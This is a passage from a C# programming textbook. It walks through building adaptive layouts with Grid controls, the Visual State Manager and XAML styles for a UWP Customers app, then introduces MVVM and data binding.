below in bold. This control displays a truncated title, Customers, in the
first row of the Grid control. Set FontSize to 30.
Click here to view code image
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
Visibility="Visible">
<Grid.RowDefinitions>
...
</Grid.RowDefinitions>
<TextBlock Grid.Row="0" HorizontalAlignment="Center"
TextWrapping="Wrap"
Text="Customers" VerticalAlignment="Center" FontSize="30"/>
</Grid>
5. Add another Grid control to row 1 of the customersColumnarView Grid
control, directly after the TextBlock control that contains the Customers
title. This Grid control will display the labels and data-entry controls in
two columns, so add the row and columns definitions shown in bold in
the following code example to this Grid.
Click here to view code image
<TextBlock Grid.Row="0" ... />
<Grid Grid.Row="1">
<Grid.ColumnDefinitions>
<ColumnDefinition/>
<ColumnDefinition/>
</Grid.ColumnDefinitions>
<Grid.RowDefinitions>
<RowDefinition/>
<RowDefinition/>
<RowDefinition/>
<RowDefinition/>
<RowDefinition/>
<RowDefinition/>
</Grid.RowDefinitions>
</Grid>
Notice that if all the rows or columns in a set have the same height or
width, you do not need to specify their size.
6. Copy the XAML markup for the ID, Title, First Name, and Last Name
TextBlock controls from the customersTabularView Grid control to the
new Grid control, immediately after the row definitions that you just
added. Put the ID control in row 0, the Title control in row 1, the First
Download from finelybook [email protected]
929
Name control in row 2, and the Last Name control in row 3. Place all
controls in column 0.
Click here to view code image
<Grid.RowDefinitions>
...
</Grid.RowDefinitions>
<TextBlock Grid.Row="0" Grid.Column="0"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="ID" VerticalAlignment="Center"
FontSize="20"/>
<TextBlock Grid.Row="1" Grid.Column="0"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="Title" VerticalAlignment="Center"
FontSize="20"/>
<TextBlock Grid.Row="2" Grid.Column="0"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="First Name" VerticalAlignment="Center"
FontSize="20"/>
<TextBlock Grid.Row="3" Grid.Column="0"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="Last Name" VerticalAlignment="Center"
FontSize="20"/>
7. Copy the XAML markup for the id, title, firstName, and lastName
TextBox and ComboBox controls from the customersTabularView Grid
control to the new Grid control, immediately after the TextBox controls.
Put the id control in row 0, the title control in row 1, the firstName
control in row 2, and the lastName control in row 3. Place all four
controls in column 1. Also, change the names of the controls by
prefixing them with the letter c (for column). This final change is
necessary to avoid clashing with the names of the existing controls in
the customersTabularView Grid control.
Click here to view code image
<TextBlock Grid.Row="3" Grid.Column="0"
HorizontalAlignment="Center"
extWrapping="Wrap" Text="Last Name" .../>
<TextBox Grid.Row="0" Grid.Column="1" x:Name="cId"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20" IsReadOnly="True"/>
<TextBox Grid.Row="2" Grid.Column="1" x:Name="cFirstName"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20"/>
Download from finelybook [email protected]
930
<TextBox Grid.Row="3" Grid.Column="1" x:Name="cLastName"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20"/>
<ComboBox Grid.Row="1" Grid.Column="1" x:Name="cTitle"
HorizontalAlignment="Stretch"
VerticalAlignment="Center" FontSize="20">
<ComboBoxItem Content="Mr"/>
<ComboBoxItem Content="Mrs"/>
<ComboBoxItem Content="Ms"/>
<ComboBoxItem Content="Miss"/>
</ComboBox>
8. Copy the TextBlock and TextBox controls for the email address and
telephone number from the customersTabularView Grid control to the
new Grid control, placing them after the cTitle ComboBox control. Place
the TextBlock controls in column 0, in rows 4 and 5, and the TextBox
controls in column 1, in rows 4 and 5. Change the name of the email
TextBox control to cEmail and the name of the phone TextBox control to
cPhone. Remove the Width properties of the cEmail and cPhone
controls, and set their HorizontalAlignment properties to Stretch.
Click here to view code image
<ComboBox ...>
...
</ComboBox>
<TextBlock Grid.Row="4" Grid.Column="0"
HorizontalAlignment="Center" TextWrapping="Wrap"
Text="Email" VerticalAlignment="Center" FontSize="20"/>
<TextBox Grid.Row="4" Grid.Column="1" x:Name="cEmail"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20"/>
<TextBlock Grid.Row="5" Grid.Column="0"
HorizontalAlignment="Center" TextWrapping="Wrap"
Text="Phone" VerticalAlignment="Center" FontSize="20"/>
<TextBox Grid.Row="5" Grid.Column="1" x:Name="cPhone"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20"/>
The Design View window should display the columnar layout like this:
Download from finelybook [email protected]
931
9. Return to the XAML markup for the customersTabularView Grid
control and set the Visibility property to Visible.
Click here to view code image
<Grid x:Name="customersTabularView" Margin="10,20,10,20"
Visibility="Visible">
10. In the XAML markup for the customersColumnarView Grid control, set
the Visibility property to Collapsed.
Click here to view code image
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
Visibility="Collapsed">
The Design View window should display the original tabular layout of
the Customers form. This is the default view that will be used by the
app.
You have now defined the layout that will appear in the narrow view. You
might be concerned that in essence all you have done is duplicated many of
the controls and laid them out in a different manner. If you run the form and
switch between views, how will data in one view transfer to the other? For
Download from finelybook [email protected]
932
example, if you enter the details for a customer when the app is running full
screen, and then you switch to the narrow view, the newly displayed controls
will not contain the same data that you just entered. UWP apps address this
problem by using data binding. This is a technique by which you can
associate the same piece of data to multiple controls, and as the data changes,
all controls display the updated information. You will see how this works in
Chapter 26. For the time being, you need to consider only how to use the
Visual State Manager to switch between layouts when the view changes.
You can use triggers that alert the Visual State Manager when some
aspect (such as the height or width) of the display changes. You can define
the visual state transitions performed by these triggers in the XAML markup
of your app. This is what you will do in the next exercise.
Use the Visual State Manager to modify the layout
1. In the XAML pane for the Customers app, after the closing </Grid> tag
for the customersColumnarView Grid control, add the following
markup:
Click here to view code image
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
Visibility="Visible">
...
</Grid>
<VisualStateManager.VisualStateGroups>
<VisualStateGroup>
<VisualState x:Name="TabularLayout">
</VisualState>
</VisualStateGroup>
</VisualStateManager.VisualStateGroups>
You define the visual state transitions by implementing one or more
visual state groups. Each visual state group specifies the transitions that
should occur when the Visual State Manager switches to this state. Each
state should be given a meaningful name to help you identify its
purpose.
2. Add the following visual state trigger shown in bold to the visual state
group:
Click here to view code image
<VisualStateManager.VisualStateGroups>
Download from finelybook [email protected]
933
<VisualStateGroup>
<VisualState x:Name="TabularLayout">
<VisualState.StateTriggers>
<AdaptiveTrigger MinWindowWidth="660"/>
</VisualState.StateTriggers>
</VisualState>
</VisualStateGroup>
</VisualStateManager.VisualStateGroups>
This trigger will fire whenever the width of the window drops below
660 pixels. This is the width at which the controls and labels on the
Customers form start to wrap and become difficult to use.
3. After the trigger definition, add the following code shown in bold to the
XAML markup:
Click here to view code image
<VisualStateManager.VisualStateGroups>
<VisualStateGroup>
<VisualState x:Name="TabularLayout">
<VisualState.StateTriggers>
<AdaptiveTrigger MinWindowWidth="660"/>
</VisualState.StateTriggers>
<VisualState.Setters>
<Setter Target="customersTabularView.Visibility"
Value="Visible"/>
<Setter
Target="customersColumnarView.Visibility" Value="Collapsed"/>
</VisualState.Setters>
</VisualState>
</VisualStateGroup>
</VisualStateManager.VisualStateGroups>
This code specifies the actions that occur when the trigger is fired. In
this example, the actions are defined by using Setter elements. A Setter
element specifies a property to set and the value to which the property
should be set. For this view, the Setter commands change the values of
specified properties; the customersTabularView Grid control is made
visible and the customersColumnarView Grid control is collapsed (made
invisible).
4. After the TabularLayout visual state definition, add the following
markup which defines the equivalent functionality to switch to the
columnar view:
Click here to view code image
Download from finelybook [email protected]
934
<VisualStateManager.VisualStateGroups>
<VisualStateGroup>
<VisualState x:Name="TabularLayout">
...
</VisualState>
<VisualState x:Name="ColumnarLayout">
<VisualState.StateTriggers>
<AdaptiveTrigger MinWindowWidth="0"/>
</VisualState.StateTriggers>
<VisualState.Setters>
<Setter Target="customersTabularView.Visibility"
Value="Collapsed"/>
<Setter
Target="customersColumnarView.Visibility" Value="Visible"/>
</VisualState.Setters>
</VisualState>
</VisualStateGroup>
</VisualStateManager.VisualStateGroups>
When the window width drops below 660 pixels, the app switches to the
ColumnarLayout state; the customersTabularView Grid control is
collapsed and the customersColumnarView Grid control is made visible.
5. In the toolbar, ensure that the Debug Target is set to Local Machine, and
then on the Debug menu, click Start Debugging.
The app starts and displays the Customer form full screen. The data is
displayed using the tabular layout.
Note If you are using a display with a resolution of less than 1366
× 768, start the app running in the Simulator as described earlier.
Configure the Simulator with a resolution of 1366 × 768.
6. Resize the Customer app window to display the form in a narrow view.
When the window width drops below 660 pixels, the display switches to
the columnar layout.
7. Resize the Customer app window to make it wider than 660 pixels (or
maximize it to full screen).
Download from finelybook [email protected]
935
The Customer form reverts to the tabular layout.
8. Return to Visual Studio and stop debugging.
Applying styles to a UI
Now that you have the mechanics of the basic layout of the app resolved, the
next step is to apply some styling to make the UI look more attractive. The
controls in a UWP app have a varied range of properties that you can use to
change features such as the font, color, size, and other attributes of an
element. You can set these properties individually for each control, but this
approach can become cumbersome and repetitive if you need to apply the
same styling to a number of controls. Also, the best apps apply a consistent
styling across the UI, and it is difficult to maintain consistency if you have to
repeatedly set the same properties and values as you add or change controls.
The more times you have to do the same thing, the greater the chances are
that you will get it wrong at least once!
With UWP apps, you can define reusable styles. You can implement them
as app-wide resources by creating a resource dictionary, and then they are
available to all controls in all pages in an app. You can also define local
resources that apply to only a single page in the XAML markup for that page.
In the following exercise, you will define some simple styles for the
Customers app and apply these styles to the controls on the Customers form.
Define styles for the Customers form
1. In Solution Explorer, right-click the Customers project, point to Add,
and then click New Item.
2. In the Add New Item - Customers dialog box, click Resource
Dictionary. In the Name box, type AppStyles.xaml, and then click Add.
The AppStyles.xaml file appears in the Code and Text Editor window. A
resource dictionary is an XAML file that contains resources that the app
can use. The AppStyles.xaml file looks like this:
Click here to view code image
<ResourceDictionary
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
Download from finelybook [email protected]
936
xmlns:local="using:Customers">
</ResourceDictionary>
Styles are one example of a resource, but you can also add other items.
In fact, the first resource that you will add is not actually a style but an
ImageBrush that will be used to paint the background of the outermost
Grid control on the Customers form.
3. In Solution Explorer, right-click the Customers project, point to Add,
and then click New Folder. Change the name of the new folder to
Images.
4. Right-click the Images folder, point to Add, and then click Existing
Item.
5. In the Add Existing Item - Customers dialog box, browse to the
\Microsoft Press\VCSBS\ Chapter 25\Resources folder in your
Documents folder, click wood.jpg, and then click Add.
The wood.jpg file is added to the Images folder in the Customers
project. This file contains an image of a tasteful wooden background
that you will use for the Customers form.
6. In the Code and Text Editor window displaying the AppStyles.xaml file,
add the following XAML markup shown in bold:
Click here to view code image
<ResourceDictionary
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="using:Customers">
<ImageBrush x:Key="WoodBrush"
ImageSource="Images/wood.jpg"/>
</ResourceDictionary>
This markup creates an ImageBrush resource called WoodBrush that is
based on the wood.jpg file. You can use this image brush to set the
background of a control, and it will display the image in the wood.jpg
file.
7. Underneath the ImageBrush resource, add the following style shown in
bold to the AppStyles.xaml file:
Download from finelybook [email protected]
937
Click here to view code image
<ResourceDictionary
...>
<ImageBrush x:Key="WoodBrush"
ImageSource="Images/wood.jpg"/>
<Style x:Key="GridStyle" TargetType="Grid">
<Setter Property="Background" Value="{StaticResource
WoodBrush}"/>
</Style>
</ResourceDictionary>
This markup shows how to define a style. A Style element should have a
name (a key that enables it to be referenced elsewhere in the app), and it
should specify the type of control to which the style can be applied. You
are going to use this style with the Grid control.
The body of a style consists of one or more Setter elements. In this
example, the Background property is set to the WoodBrush ImageBrush
resource. The syntax is a little curious, though. In a value, you can either
reference one of the appropriate system-defined values for the property
(such as “Red” if you want to set the background to a solid red color) or
specify a resource that you have defined elsewhere. To reference a
resource defined elsewhere, you use the StaticResource keyword and
then place the entire expression in curly braces.
8. Before you can use this style, you must update the global resource
dictionary for the app in the App.xaml file by adding a reference to the
AppStyles.xaml file. In Solution Explorer, double-click App.xaml to
display it in the Code and Text Editor window. The App.xaml file looks
like this:
Click here to view code image
<Application
x:Class="Customers.App"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="using:Customers"
RequestedTheme="Light">
</Application>
Currently, the App.xaml file defines only the app object and brings a
few namespaces into scope; the global resource dictionary is empty.
Download from finelybook [email protected]
938
9. Add to the App.xaml file the code shown here in bold:
Click here to view code image
<Application
x:Class="Customers.App"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="using:Customers"
RequestedTheme="Light">
<Application.Resources>
<ResourceDictionary>
<ResourceDictionary.MergedDictionaries>
<ResourceDictionary Source="AppStyles.xaml"/>
</ResourceDictionary.MergedDictionaries>
</ResourceDictionary>
</Application.Resources>
</Application>
This markup adds the resources defined in the AppStyles.xaml file to the
list of resources available in the global resource dictionary. These
resources are now available for use throughout the app.
10. Switch to the MainPage.xaml file displaying the UI for the Customers
form. In the XAML pane, find the outermost Grid control:
Click here to view code image
<Grid Background="{ThemeResource
ApplicationPageBackgroundThemeBrush}">
In the XAML markup for this control, replace the Background property
with a Style property that references the GridStyle style, as shown in
bold in the following code:
Click here to view code image
<Grid Style="{StaticResource GridStyle}">
11. On the Build menu, click Rebuild Solution.
The background of the Grid control in the Design View window should
switch and display a wooden panel, like this:
Download from finelybook [email protected]
939
Note Ideally, you should ensure that any background image that
you apply to a page or control maintains its aesthetics as the device
form factor and orientation change. An image that looks cool on a
30-inch monitor might appear distorted and squashed on a
Windows phone. It might be necessary to provide alternative
backgrounds for different views and orientations and use the
Visual State Manager to modify the Background property of a
control to switch between them as the visual state changes.
12. Return to AppStyles.xaml in the Code and Text Editor window and add
the following FontStyle style after the GridStyle style:
Click here to view code image
<Style x:Key="GridStyle" TargetType="Grid">
...
</Style>
<Style x:Key="FontStyle" TargetType="TextBlock">
<Setter Property="FontFamily" Value="Segoe Print"/>
Download from finelybook [email protected]
940
</Style>
This style applies to TextBlock elements and changes the font to Segoe
Print. This font resembles a handwriting style.
At this stage, it would be possible to reference the FontStyle style in
every TextBlock control that required this font, but this approach would
not provide any advantage over simply setting the FontFamily directly
in the markup for each control. The real power of styles occurs when
you combine multiple properties, as you will see in the next few steps.
13. Add the HeaderStyle style shown here to the AppStyles.xaml file:
Click here to view code image
<Style x:Key="FontStyle" TargetType="TextBlock">
...
</Style>
<Style x:Key="HeaderStyle" TargetType="TextBlock" BasedOn="
{StaticResource FontStyle}">
<Setter Property="HorizontalAlignment" Value="Center"/>
<Setter Property="TextWrapping" Value="Wrap"/>
<Setter Property="VerticalAlignment" Value="Center"/>
<Setter Property="Foreground" Value="SteelBlue"/>
</Style>
This is a composite style that sets the HorizontalAlignment,
TextWrapping, VerticalAlignment, and Foreground properties of a
TextBlock. Additionally, the HeaderStyle style references the FontStyle
style by using the BasedOn property. The BasedOn property provides a
simple form of inheritance for styles.
You will use this style to format the labels that appear at the top of the
customersTabularView and customersColumnarView controls.
However, these headings have different font sizes (the heading for the
tabular layout is bigger than that of the columnar layout), so you will
create two more styles that extend the HeaderStyle style.
14. Add the following styles to the AppStyles.xaml file:
Click here to view code image
<Style x:Key="HeaderStyle" TargetType="TextBlock" BasedOn="
{StaticResource FontStyle}">
...
</Style>
Download from finelybook [email protected]
941
<Style x:Key="TabularHeaderStyle" TargetType="TextBlock"
BasedOn="{StaticResource HeaderStyle}">
<Setter Property="FontSize" Value="40"/>
</Style>
<Style x:Key="ColumnarHeaderStyle" TargetType="TextBlock"
BasedOn="{StaticResource HeaderStyle}">
<Setter Property="FontSize" Value="30"/>
</Style>
Note that the font sizes for these styles are slightly smaller than the font
sizes currently used by the headings in the Grid controls. This is because
the Segoe Print font is bigger than the default font.
15. Switch back to the MainPage.xaml file and find the XAML markup for
the TextBlock control for the Adventure Works Customers label in the
customersTabularView Grid control:
Click here to view code image
<TextBlock Grid.Row="0" HorizontalAlignment="Center"
TextWrapping="Wrap"
Text="Adventure Works Customers" VerticalAlignment="Center"
FontSize="50"/>
16. Change the properties of this control to reference the
TabularHeaderStyle style, as shown in bold in the following code:
Click here to view code image
<TextBlock Grid.Row="0" Style="{StaticResource
TabularHeaderStyle}"
Text="Adventure Works Customers"/>
The heading displayed in the Design View window should change color,
size, and font and look like this:
17. Find the XAML markup for the TextBlock control for the Customers
label in the customersColumnarView Grid control:
Click here to view code image
Download from finelybook [email protected]
942
<TextBlock Grid.Row="0" HorizontalAlignment="Center"
TextWrapping="Wrap"
Text="Customers" VerticalAlignment="Center" FontSize="30"/>
Modify the markup of this control to reference the
ColumnarHeaderStyle style, as shown here in bold:
Click here to view code image
<TextBlock Grid.Row="0" Style="{StaticResource
ColumnarHeaderStyle}"
Text="Customers"/>
Be aware that you won’t see this change in the Design View window
because the customersColumnarView Grid control is collapsed by
default. However, you will see the effects of this change when you run
the app later in this exercise.
18. Return to the AppStyles.xaml file in the Code and Text Editor window.
Modify the HeaderStyle style with the additional property Setter
elements shown in bold in the following example:
Click here to view code image
<Style x:Key="HeaderStyle" TargetType="TextBlock" BasedOn="
{StaticResource FontStyle}">
<Setter Property="HorizontalAlignment" Value="Center"/>
<Setter Property="TextWrapping" Value="Wrap"/>
<Setter Property="VerticalAlignment" Value="Center"/>
<Setter Property="Foreground" Value="SteelBlue"/>
<Setter Property="RenderTransformOrigin" Value="0.5,0.5"/>
<Setter Property="RenderTransform">
<Setter.Value>
<CompositeTransform Rotation="-5"/>
</Setter.Value>
</Setter>
</Style>
These elements rotate the text displayed in the header about its midpoint
by an angle of 5 degrees by using a transformation.
Note This example shows a simple transformation. Using the
RenderTransform property, you can perform a variety of other
Download from finelybook [email protected]
943
transformations to an item, and you can combine multiple
transformations. For example, you can translate (move) an item on
the x- and y-axes, skew the item (make it lean), and scale an
element.
You should also notice that the value of the RenderTransform
property is itself another property/value pair (the property is
Rotation, and the value is –5). In cases such as this, you specify the
value by using the <Setter.Value> tag.
19. Switch to the MainPage.xaml file. In the Design View window, the title
should now be displayed at a jaunty angle (you might need to rebuild the
application first before the updated style is applied):
20. In the AppStyles.xaml file, add the following style:
Click here to view code image
<Style x:Key="LabelStyle" TargetType="TextBlock" BasedOn="
{StaticResource FontStyle}">
<Setter Property="FontSize" Value="20"/>
<Setter Property="HorizontalAlignment" Value="Center"/>
<Setter Property="TextWrapping" Value="Wrap"/>
<Setter Property="VerticalAlignment" Value="Center"/>
<Setter Property="Foreground" Value="AntiqueWhite"/>
</Style>
You will apply this style to the TextBlock elements that provide the
labels for the various TextBox and ComboBox controls that the user
employs to enter customer information. The style references the same
font style as the headings but sets the other properties to values more
appropriate for the labels.
21. Go back to the MainPage.xaml file. In the XAML pane, modify the
Download from finelybook [email protected]
944
markup for the TextBlock controls for each of the labels in the
customersTabularView and customersColumnarView Grid controls.
Remove the HorizontalAlignment, TextWrapping, VerticalAlignment,
and FontSize properties, and reference the LabelStyle style, as shown
here in bold:
Click here to view code image
<Grid x:Name="customersTabularView" Margin="10,20,10,20"
Visibility="Visible">
...
<Grid Grid.Row="2">
...
<TextBlock Grid.Row="0" Grid.Column="1" Style="
{StaticResource LabelStyle}"
Text="ID"/>
<TextBlock Grid.Row="0" Grid.Column="3" Style="
{StaticResource LabelStyle}"
Text="Title"/>
<TextBlock Grid.Row="0" Grid.Column="5" Style="
{StaticResource LabelStyle}"
Text="First Name"/>
<TextBlock Grid.Row="0" Grid.Column="7" Style="
{StaticResource LabelStyle}"
Text="Last Name"/>
...
<TextBlock Grid.Row="3" Grid.Column="1" Style="
{StaticResource LabelStyle}"
Text="Email"/>
...
<TextBlock Grid.Row="5" Grid.Column="1" Style="
{StaticResource LabelStyle}"
Text="Phone"/>
...
</Grid>
</Grid>
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
Visibility="Collapsed">
...
<Grid Grid.Row="1">
...
<TextBlock Grid.Row="0" Grid.Column="0" Style="
{StaticResource LabelStyle}"
Text="ID"/>
<TextBlock Grid.Row="1" Grid.Column="0" Style="
{StaticResource LabelStyle}"
Text="Title"/>
<TextBlock Grid.Row="2" Grid.Column="0" Style="
{StaticResource LabelStyle}"
Download from finelybook [email protected]
945
Text="First Name"/>
<TextBlock Grid.Row="3" Grid.Column="0" Style="
{StaticResource LabelStyle}"
Text="Last Name"/>
...
<TextBlock Grid.Row="4" Grid.Column="0" Style="
{StaticResource LabelStyle}"
Text="Email"/>
...
<TextBlock Grid.Row="5" Grid.Column="0" Style="
{StaticResource LabelStyle}"
Text="Phone"/>
...
</Grid>
</Grid>
The labels on the form should change to the Segoe Print font and be
displayed in white, in a font size of 30 points:
22. On the Debug menu, click Start Debugging to build and run the app.
Download from finelybook [email protected]
946
Note Use the Simulator if you are running on a display with a
resolution less than 1366 × 768.
The Customers form should appear and be styled in the same way that it
appears in the Design View window in Visual Studio. Notice that if you
enter any text into the various fields on the form, they use the default
font and styling for the TextBox controls.
Note Although the Segoe Print font is good for labels and titles, it
is not recommended as a font for data-entry fields because some of
the characters can be difficult to distinguish from one another. For
example, the lowercase letter l is very similar to the digit 1, and the
uppercase letter O is almost indistinguishable from the digit 0. For
this reason, it makes sense to stick with the default font for the
TextBox controls.
23. Resize the window to make it narrower and verify that the styling has
been applied to the controls in the customersColumnarView grid. The
form should look like this:
Download from finelybook [email protected]
947
24. Return to Visual Studio and stop debugging.
You can see that by using styles, you can easily implement a number of
really cool effects. Also, careful use of styles makes your code much more
maintainable than it would be if you set properties on individual controls. For
example, if you want to switch the font used by the labels and headings in the
Customers app, you need to make only a single change to the FontStyle style.
In general, you should use styles wherever possible; besides assisting
maintainability, the use of styles helps to keep the XAML markup for your
forms clean and uncluttered, and the XAML for a form needs to specify only
the controls and layout rather than how the controls should appear on the
form. You can also use Microsoft Blend for Visual Studio 2017 to define
complex styles that you can integrate into an app. Professional graphics
Download from finelybook [email protected]
948
artists can use Blend to develop custom styles and provide these styles in the
form of XAML markup to developers building apps. All the developer has to
do is add the appropriate Style tags to the user interface elements to reference
the corresponding styles.
Summary
In this chapter, you learned how to use the Grid control to implement a user
interface that can scale to different device form factors and orientations. You
also learned how to use the Visual State Manager to adapt the layout of
controls when the user changes the size of the window displaying the app.
Finally, you learned how to create custom styles and apply them to the
controls on a form. Now that you have defined the user interface, the next
challenge is to add functionality to the app, enabling the user to display and
update data, which is what you will do in the final chapters.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 26.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Create a new UWP
app
Use one of the UWP templates in Visual Studio
2017, such as the Blank App template.
Implement a user
interface that scales to
different device form
factors and
orientations
Use a Grid control. Divide the Grid control into
rows and columns, and place controls in these rows
and columns rather than specifying an absolute
location relative to the edges of the Grid.
Implement a user
interface that can
adapt to different
display widths
Create different layouts for each view that display
the controls in an appropriate manner. Use the
Visual State Manager to select the layout to display
when the visual state changes.
Download from finelybook [email protected]
949
Create custom styles
Add a resource dictionary to the app. Define styles
in this dictionary by using the <Style> element,
and specify the properties that each style changes.
For example:
Click here to view code image
<Style x:Key="GridStyle" TargetType="Grid">
<Setter Property="Background" Value="
{StaticResource WoodBrush}"/>
</Style>
Apply a custom style
to a control
Set the Style property of the control and reference
the style by name. For example:
Click here to view code image
<Grid Style="{StaticResource GridStyle}">
Download from finelybook [email protected]
950
CHAPTER 26
Displaying and searching for data in
a Universal Windows Platform app
After completing the chapter, you will be able to:
Explain how to use the Model–View–ViewModel pattern to implement
the logic for a Universal Windows Platform app.
Use data binding to display and modify data in a view.
Create a ViewModel with which a view can interact with a model.
Integrate a Universal Windows Platform app with Cortana to provide
voice-activated search capabilities.
Chapter 25, “Implementing the user interface for a Universal Windows
Platform app,” demonstrates how to design a user interface (UI) that can
adapt to the different device form factors, orientations, and views that a
customer running your app might use. The sample app developed in that
chapter is a simple one designed for displaying and editing details about
customers.
In this chapter, you will see how to display data in the UI and learn about
the features in Windows 10 with which you can search for data in an app. In
performing these tasks, you will also learn about the way in which you can
structure a UWP app. This chapter covers a lot of ground. In particular, you
will look at how to use data binding to connect the UI to the data that it
displays and how to create a ViewModel to separate the user interface logic
from the data model and business logic for an app. You will also see how to
integrate a UWP app with Cortana to enable a user to perform voice-activated
Download from finelybook [email protected]
951
searches.
Implementing the Model–View–ViewModel pattern
A well-structured graphical app separates the design of the user interface
from the data that the application uses and the business logic that comprises
the functionality of the app. This separation helps to remove the
dependencies between the various components, enabling different
presentations of the data without needing to change the business logic or the
underlying data model. This approach also clears the way for different
elements to be designed and implemented by individuals who have the
appropriate specialist skills. For example, a graphic artist can focus attention
on designing an appealing and intuitive UI, a database specialist can
concentrate on implementing an optimized set of data structures for storing
and accessing the data, and a C# developer can direct her efforts toward
implementing the business logic for the app. This is a common goal that has
been the aim of many development approaches, not just for UWP apps, and
over the past few years many techniques have been devised to help structure
an app in this way.
Arguably, the most popular approach is to follow the Model–View–
ViewModel (MVVM) design pattern. In this design pattern, the model
provides the data used by the app, and the view represents the way in which
the data is displayed in the UI. The ViewModel contains the logic that
connects the two, taking the user input and converting it into commands that
perform business operations on the model, and also taking the data from the
model and formatting it in the manner expected by the view. The following
diagram shows a simplified relationship between the elements of the MVVM
pattern. Note that an app might provide multiple views of the same data. In a
UWP app, for example, you might implement different view states, which
can present information by using different screen layouts. One job of the
ViewModel is to ensure that the data from the same model can be displayed
and manipulated by many different views. In a UWP app, the view can utilize
data binding to connect to the data presented by the ViewModel.
Additionally, the view can request that the ViewModel update data in the
model or perform business tasks by invoking commands implemented by the
ViewModel.
Download from finelybook [email protected]
952
Displaying data by using data binding
Before you get started implementing a ViewModel for the Customers app, it
helps to understand a little more about data binding and how you can apply
this technique to display data in a UI. Using data binding, you can link a
property of a control to a property of an object; if the value of the specified
property of the object changes, the property in the control that is linked to the
object also changes. Also, data binding can be bidirectional: if the value of a
property in a control that uses data binding changes, the modification is
propagated to the object to which the control is linked. The following
exercise provides a quick introduction to how data binding is used to display
data. It is based on the Customers app from Chapter 25.
Use data binding to display Customer information
1. Start Visual Studio 2017 if it is not already running.
2. Open the Customers solution, which is located in the \Microsoft
Press\VCSBS\Chapter 26\Data Binding folder in your Documents
folder. This is a version of the Customers app that was developed in
Chapter 25, but the layout of the UI has been modified slightly; the
controls are displayed on a blue background, which makes them stand
out more easily.
Note The blue background was created by using a Rectangle
control that spans the same rows and columns as the TextBlock and
Download from finelybook [email protected]
953
TextBox controls that display the headings and data. The rectangle
is filled by using a LinearGradientBrush that gradually changes
the color of the rectangle from a medium blue at the top to a very
dark blue at the bottom. The XAML markup for the Rectangle
control that is displayed in customersTabularView Grid control
views looks like this (the XAML markup for the
customersColumnarView Grid control includes a similar Rectangle
control, spanning the rows and columns used by that layout):
Click here to view code image
<Rectangle Grid.Row="0" Grid.RowSpan="6" Grid.Column="1"
Grid.ColumnSpan="7" ...>
<Rectangle.Fill>
<LinearGradientBrush EndPoint="0.5,1"
StartPoint="0.5,0">
<GradientStop Color="#FF0E3895"/>
<GradientStop Color="#FF141415" Offset="0.929"/>
</LinearGradientBrush>
</Rectangle.Fill>
</Rectangle>
3. In Solution Explorer, right-click the Customers project, point to Add,
and then click Class.
4. In the Add New Items - Customers dialog box, ensure that the Class
template is selected. In the Name box, type Customer.cs, and then click
Add.
You will use this class to implement the Customer data type and then
implement data binding to display the details of Customer objects in the
UI.
5. In the Code and Text Editor window displaying the Customer.cs file,
make the Customer class public and add the following private fields and
properties shown in bold:
Click here to view code image
public class Customer
{
public int _customerID;
public int CustomerID
{
Download from finelybook [email protected]
954
get => this._customerID;
set
{
this._customerID = value;
}
}
public string _title;
public string Title
{
get => this._title;
set
{
this._title = value;
}
}
public string _firstName;
public string FirstName
{
get => this._firstName;
set
{
this._firstName = value;
}
}
public string _lastName;
public string LastName
{
get => this._lastName;
set
{
this._lastName = value;
}
}
public string _emailAddress;
public string EmailAddress
{
get => this._emailAddress;
set
{
this._emailAddress = value;
}
}
public string _phone;
public string Phone
{
get => this._phone;
Download from finelybook [email protected]
955
set
{
this._phone = value;
}
}
}
You might be wondering why the property setters are not implemented
as expression-bodied members, given that all they do is set the value in a
private field. However, you will add additional code to these properties
in a later exercise.
6. In Solution Explorer, in the Customers project, double-click the
MainPage.xaml file to display the user interface for the application in
the Design View window.
7. In the XAML pane, locate the markup for the id TextBox control.
Modify the XAML markup that sets the Text property for this control as
shown here in bold:
Click here to view code image
<TextBox Grid.Row="1" Grid.Column="1" x:Name="id" ...
Text="{Binding CustomerID}" .../>
The syntax Text=”{Binding Path}” specifies that the value of the Text
property will be provided by the value of the Path expression at runtime.
In this case, Path is set to CustomerID, so the value held in the
CustomerID expression will be displayed by this control. However, you
need to provide a bit more information to indicate that CustomerID is
actually a property of a Customer object. To do this, you set the
DataContext property of the control, which you will do shortly.
8. Add the following binding expressions for each of the other text controls
on the form. Apply data binding to the TextBox controls in the
customersTabularView and customersColumnarView Grid controls, as
shown in bold in the following code. (The ComboBox controls require
slightly different handling, which you will address in the section “Using
data binding with a ComboBox control” later in this chapter.)
Click here to view code image
<Grid x:Name="customersTabularView" ...>
...
<TextBox Grid.Row="1" Grid.Column="5" x:Name="firstName" ...
Download from finelybook [email protected]
956
Text="{Binding FirstName}" .../>
<TextBox Grid.Row="1" Grid.Column="7" x:Name="lastName" ...
Text="{Binding LastName}" .../>
...
